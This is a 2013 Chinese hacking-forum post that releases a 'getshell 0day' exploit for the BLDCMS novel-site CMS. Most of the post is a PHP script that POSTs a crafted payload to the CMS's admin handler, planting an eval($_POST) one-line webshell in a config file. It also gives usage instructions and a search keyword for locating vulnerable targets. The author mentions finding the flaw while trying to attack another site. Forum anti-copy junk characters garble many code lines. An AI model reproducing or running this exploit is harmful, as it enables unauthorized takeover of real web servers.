找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2321|回复: 0
打印 上一主题 下一主题

BLDCMS(白老大小说) Getshell 0day EXP

[复制链接]
跳转到指定楼层
楼主
发表于 2013-3-26 20:49:10 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
之前想搞一个黑阔站 发现旁站有一个站用了BLDCMS 我就下载看了.. 找到了一个getshell漏洞
& y" Q. {! p9 `* W* Q- ^
7 k& s& n; Z( W0 `7 f. y5 Y
  H3 W+ C. H8 j% c" K# C& ?2 V% {/ e话说昨晚晴天小铸在90sec发现有人把这getshell漏洞的分析发出来了 擦 居然被人先发了
# p; f/ ?5 w2 }; y . \, G1 v' A0 c0 {. e. I/ z: G
既然都有人发了 我就把我之前写好的EXP放出来吧
: }: R- T, _* S8 A; |, T - U; K  }* `0 e" ?" }/ e. W
view source print?01.php;">2 h3 i. P1 Y6 _' a
02.<!--?php
7 N0 [" t7 Y! M$ H* s03.echo "-------------------------------------------------------------------- w1 o  A  j' r
04. ' i! X3 Y* q5 F- V
05.------------\r\n              BLDCMS(白老大php小说小偷) GETSHELL 0DAY EXP& M" l3 P; D5 \. @+ ^
06.
% q2 B; L* s1 }07.(GPC=Off)\r\n            Vulnerability discovery&Code by 数据流@wooyun/ a" }7 j6 a* {* y- D  E. `' J
08.
) L2 e7 L& O6 C( G  E1 y09.QQ:981009941\r\n                                2013.3.21\r\n             ; u! [+ y( A4 v2 ~" Z* R, D
10.
. _8 U% L& U; l; ^( O11.
3 Y& c0 g, ?7 \/ K12.用法:php.exe EXP.php www.baidu.com /cms/ pass(一句话密码& n) r5 @7 Q, X1 n% ]$ I
13. % Z( Y! b2 W4 |
14.)\r\n                    搜索关键字:\"开发者: 白老大小说\"\r\n-----------
2 i& L  x4 p4 C0 V4 |6 x15.
# Y- f- F3 b& m. A+ C8 k7 ^16.--------------------------------------------------------------------\r\n";
, u; G6 u" h  P% O6 |( n0 W17.$url=$argv[1];
# r- y2 q# y4 G; v2 w5 ^" X0 z& D18.$dir=$argv[2];
, o: p8 g( A1 T) }* _8 b5 C19.$pass=$argv[3];3 U! N& y! P8 d" X( K
20.$eval='\';eval($_POST['.'"'.$pass.'"'.']);\'';' @  c/ G$ j- G2 o9 c8 t7 h
21.if (emptyempty($pass)||emptyempty($url))! Z8 S7 }+ }2 S3 i
22.{exit("请输入参数");}5 n; K9 N/ r+ A
23.else6 I0 T+ l& P- r, F
24.{) z8 G0 Q' n, E9 ?
25.$fuckdata='sitename=a&qq=1&getcontent=acurl&tongji=a&cmsmd5=1&sqlite='.$ev
3 w6 V  o- c: k# [( O26. 3 h, b7 @6 Q# t, t. F
27.al;0 A) [) R, i* t7 x) i
28.$length = strlen($fuckdata);. {4 N" q, Y  L8 l. @2 ]
29.function getshell($url,$pass). _, K, {7 M, |- q# R+ ?) c/ l
30.{
5 k1 y+ r! q1 ^9 {( I; U31.global $url,$dir,$pass,$eval,$length,$fuckdata;
/ O) j7 [4 N& o* I32.$header = "OST /admin/chuli.php?action=a_1 HTTP/1.1\r\n";# D' J; g6 G3 M/ H4 A
33.$header .= "Content-Type: application/x-www-form-urlencoded\r\n";
  n: ~' h1 w4 Y$ E34.$header .= "User-Agent: MSIE\r\n";
) L  m9 I9 X7 @35.$header .= "Host:".$url."\r\n";% J5 e! }9 r5 h2 F
36.$header .= "Content-Length: ".$length."\r\n";9 `" J/ |1 _% P8 S+ z/ k
37.$header .= "Connection: Close\r\n";
& P* _$ \& \8 E. i: [1 u% b38.$header .="\r\n";
, j9 u8 v8 R# q3 ]6 J& G0 t39.$header .= $fuckdata."\r\n\r\n";
. s* ?7 p7 S- V9 [* _' \0 q40.$fp = fsockopen($url, 80,$errno,$errstr,15);) c5 R5 |- @$ g  O
41.if (!$fp)5 o* Z0 n$ a& p1 ?$ L
42.{
& G7 N: V! q$ v8 o1 G43.exit ("利用失败:请检查指定目标是否能正常打开");. r0 d/ M$ _) ~; Z' y# S
44.}
! d* S% C! R) u( _+ L! R1 w+ f45.else{ if (!fputs($fp,$header))
: k  k. i4 R5 i, t) [, X3 o46.{exit ("利用失败");}
& `" u( e  Q# x47.else- R& g# Z: X) ?7 j7 f, P
48.{
4 E. x! w; c5 J# ?. l49.$receive = '';# o! w$ O% W. N! R8 |! @
50.while (!feof($fp)) {/ ^! g* x2 a, j* K5 f- ?" B/ k
51.$receive .= @fgets($fp, 1000);
) U* Z8 i* C( R% v- k52.}$ `& s0 p& @) N' _5 X+ P
53.@fclose($fp);
+ ~# \0 v+ _/ l5 W5 O54.echo "$url/$dir/conn/config/normal2.php passpass(如连接失败 请检查目标
! k4 a5 t, A  S: y- U1 F, J$ T  d/ `55.
4 X0 R  i/ e  n+ B. ]6 H56.GPC是否=off)";0 Y% u) I# G4 v9 _1 B" g
57.}}
- K7 J$ _0 x: {: G$ l58.}# @! Q1 f; h, D; z, B: i
59.}
. ?, j: E) N0 }60.getshell($url,$pass);. W& j3 Z9 Z$ A
61.?-->. \% a9 c6 |" j  P6 e/ A+ u

/ t8 r( z( k2 V) }  Y3 w
& J5 V# K* v; Z3 u2 X3 g  F7 D9 o ; K9 D. e- T0 B1 [/ N" L1 e
by 数据流
/ p% _% D1 M/ n0 k. B& N6 g: V
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表